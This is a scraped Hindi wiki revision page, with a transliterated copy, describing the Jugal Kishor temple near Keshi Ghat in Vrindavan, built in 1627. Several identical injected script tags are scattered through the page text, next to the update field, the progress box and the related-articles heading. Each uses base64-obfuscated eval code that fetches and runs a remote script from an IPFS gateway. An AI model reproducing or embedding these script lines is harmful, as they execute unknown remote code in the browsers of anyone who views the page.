Difference between revisions of "जुगलकिशोर जी का मन्दिर वृन्दावन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
m (Text replacement - "शृंखला" to "श्रृंखला")
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
[[चित्र:jugal-kishor-temple-1.jpg|जुगलकिशोर जी का मन्दिर, [[वृन्दावन]]<br /> Jugal Kishor Temple, Vrindavan|thumb|200px|right]]
+
{{सूचना बक्सा ऐतिहासिक इमारत
 +
|चित्र=jugal-kishor-temple-1.jpg
 +
|चित्र का नाम=जुगलकिशोर जी का मन्दिर
 +
|विवरण=जुगलकिशोर जी का मन्दिर एक [[वैष्णव संप्रदाय]] का मन्दिर है।
 +
|राज्य=[[उत्तर प्रदेश]]
 +
|नगर=[[वृन्दावन]]
 +
|निर्माता=नानकरन
 +
|स्वामित्व=
 +
|प्रबंधक=
 +
|निर्माण=सन् 1627 ई.
 +
|वास्तुकार=
 +
|वास्तु शैली=
 +
|पुन: निर्माण=
 +
|स्थापना=
 +
|पुन: स्थापना=
 +
|भौगोलिक स्थिति=
 +
|मार्ग स्थिति=
 +
|प्रसिद्धि=उत्तरी भारत की स्थापत्य कला के उत्‍कृष्टतम इमारतों में से एक
 +
|एस.टी.डी. कोड=
 +
|मानचित्र लिंक=
 +
|संबंधित लेख=[[गोविन्द देव मन्दिर वृन्दावन|गोविन्द देव मन्दिर]], [[गोपी नाथ जी मंदिर वृन्दावन|गोपीनाथ मन्दिर]] और [[मदन मोहन मन्दिर वृन्दावन|मदन मोहन मन्दिर]]
 +
|शीर्षक 1=शासन काल
 +
|पाठ 1=[[मुग़ल]] ([[जहाँगीर]])
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=[[ग्राउस]] ने मन्दिर का जीर्णोद्धार कराया था। नगरपालिका ने ऊपर के कमरे को एक रुपया मासिक किराये पर उठा दिया था जिससे कि कोई उस पर अनाधिकार न कर ले और उस की सफ़ाई होती रहे।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन={{अद्यतन|13:35, 17 जुलाई 2012 (IST)}}
 +
}}
 +
'''जुगलकिशोर जी का मन्दिर''' [[उत्तर प्रदेश]] राज्य में [[मथुरा ज़िला|मथुरा ज़िले]] के [[वृन्दावन]] नगर में स्थित एक [[वैष्णव संप्रदाय]] का मन्दिर है।
 +
यह मन्दिर [[गोविन्ददेव मन्दिर वृन्दावन|गोविन्ददेव]], [[मदन मोहन मंदिर वृन्दावन|मदनमोहन]] और [[गोपी नाथ जी मन्दिर वृन्दावन|गोपीनाथ मन्दिर]] की ही श्रृंखला में यह चौथा है।
 +
==निर्माण==
 +
जुगलकिशोर जी का मन्दिर, [[केशी घाट वृन्दावन|केशी घाट]] के पास स्थित है। इसका निर्माण [[जहाँगीर]] के समय में सन् 1627 ई. में हुआ था। इसका निर्माणकर्त्ता नानकरन था। यह चौहान ठाकुर था। परन्तु यह भी असंभव नहीं है कि वह [[गोपी नाथ जी मन्दिर वृन्दावन|गोपीनाथ]] मन्दिर के निर्माता रायसिल का बड़ा भाई रहा हो। इसका जगमोहन दूसरे मन्दिरों के जगमोहन की अपेक्षा कुछ बड़ा है जो 25 वर्गफीट का है, द्वार पूर्व को है। किन्तु उत्तर और दक्षिण में भी छोटे-छोटे द्वार हैं। गर्भग्रह नष्ट हो चुका था।
 +
==जीर्णोद्धार==
 +
[[चित्र:Jugal Kishor-Temple-2.jpg|thumb|200px|left|जुगलकिशोर मन्दिर, [[वृन्दावन]]]]
 +
[[ग्राउस]] ने मन्दिर का जीर्णोद्धार कराया था। नगरपालिका ने ऊपर के कमरे को एक रुपया मासिक किराये पर उठा दिया था जिससे कि कोई उस पर अनाधिकार न कर ले और उस की सफ़ाई होती रहे। कुछ ही दिनों बाद नये कलक्टर के आते ही इसका दुरुपयोग होने लगा और यह पशु घर बन गया था।
  
पुरानी शृंखला में यह चौथा है। यह [[केशी घाट वृन्दावन|केशी घाट]] के पास स्थित है। इसका निर्माण [[जहाँगीर]] के समय में सन् 1627 ई. में हुआ था। इसका निर्माणकर्त्ता नानकरन था। यह चौहान ठाकुर था। परन्तु यह भी असंभव नहीं है कि वह [[गोपी नाथ जी मन्दिर वृन्दावन|गोपीनाथ]] मन्दिर के निर्माता रायसिल का बड़ा भाई रहा हो। इसका जगमोहन दूसरे मन्दिरों के जगमोहन की अपेक्षा कुछ बड़ा है जो 25 वर्गफीट का है,द्वार पूर्व को है। किन्तु उत्तर और दक्षिण में भी छोटे-छोटे द्वार हैं। गर्भग्रह नष्ट हो चुका था।
+
 
[[चित्र:Jugal Kishor-Temple-2.jpg|thumb|200px|left|जुगलकिशोर मन्दिर, [[वृन्दावन]]<br />
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
Jugal Kishor Temple, Vrindavan]]
 
[[ग्राउस]] ने मन्दिर का जीर्णोध्दार कराया था। नगरपालिका ने ऊपर के कमरे को एक रुपया मासिक किराये पर उठा दिया था जिससे कि कोई उस पर अनाधिकार न कर ले और उस की सफ़ाई होती रहे। कुछ ही दिनों बाद नये कलक्टर के आते ही इसका दुरूपयोग होने लगा और यह पशु घर बन गया था।
 
{| width="100%"
 
|-
 
|
 
 
==संबंधित लेख==
 
==संबंधित लेख==
|-
 
|
 
 
{{ब्रज के दर्शनीय स्थल}}
 
{{ब्रज के दर्शनीय स्थल}}
|}
 
 
[[Category:ब्रज]]
 
[[Category:ब्रज]]
[[Category:ब्रज के दर्शनीय स्थल]]
+
[[Category:ब्रज के दर्शनीय स्थल]][[Category:उत्तर प्रदेश]] [[Category:उत्तर प्रदेश के मन्दिर]][[Category:हिन्दू मन्दिर]]
 
[[Category:ब्रज के धार्मिक स्थल]]
 
[[Category:ब्रज के धार्मिक स्थल]]
 
[[Category:पर्यटन कोश]]
 
[[Category:पर्यटन कोश]]
 
[[Category:धार्मिक स्थल कोश]]
 
[[Category:धार्मिक स्थल कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 11:22, 9 February 2021

jugalakishor ji ka mandir vrindavan
vivaran jugalakishor ji ka mandir ek vaishnav sanpraday ka mandir hai.
rajy uttar pradesh
nagar vrindavan
nirmata nanakaran
nirman sanh 1627 ee.
prasiddhi uttari bharat ki sthapaty kala ke uth‍krishtatam imaratoan mean se ek
sanbandhit lekh govind dev mandir, gopinath mandir aur madan mohan mandir
shasan kal mugal (jahaangir)
any janakari graus ne mandir ka jirnoddhar karaya tha. nagarapalika ne oopar ke kamare ko ek rupaya masik kiraye par utha diya tha jisase ki koee us par anadhikar n kar le aur us ki safaee hoti rahe.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

jugalakishor ji ka mandir uttar pradesh rajy mean mathura zile ke vrindavan nagar mean sthit ek vaishnav sanpraday ka mandir hai. yah mandir govindadev, madanamohan aur gopinath mandir ki hi shrriankhala mean yah chautha hai.

nirman

jugalakishor ji ka mandir, keshi ghat ke pas sthit hai. isaka nirman jahaangir ke samay mean sanh 1627 ee. mean hua tha. isaka nirmanakartta nanakaran tha. yah chauhan thakur tha. parantu yah bhi asanbhav nahian hai ki vah gopinath mandir ke nirmata rayasil ka b da bhaee raha ho. isaka jagamohan doosare mandiroan ke jagamohan ki apeksha kuchh b da hai jo 25 vargaphit ka hai, dvar poorv ko hai. kintu uttar aur dakshin mean bhi chhote-chhote dvar haian. garbhagrah nasht ho chuka tha.

jirnoddhar

[[chitr:Jugal Kishor-Temple-2.jpg|thumb|200px|left|jugalakishor mandir, vrindavan]] graus ne mandir ka jirnoddhar karaya tha. nagarapalika ne oopar ke kamare ko ek rupaya masik kiraye par utha diya tha jisase ki koee us par anadhikar n kar le aur us ki safaee hoti rahe. kuchh hi dinoan bad naye kalaktar ke ate hi isaka durupayog hone laga aur yah pashu ghar ban gaya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>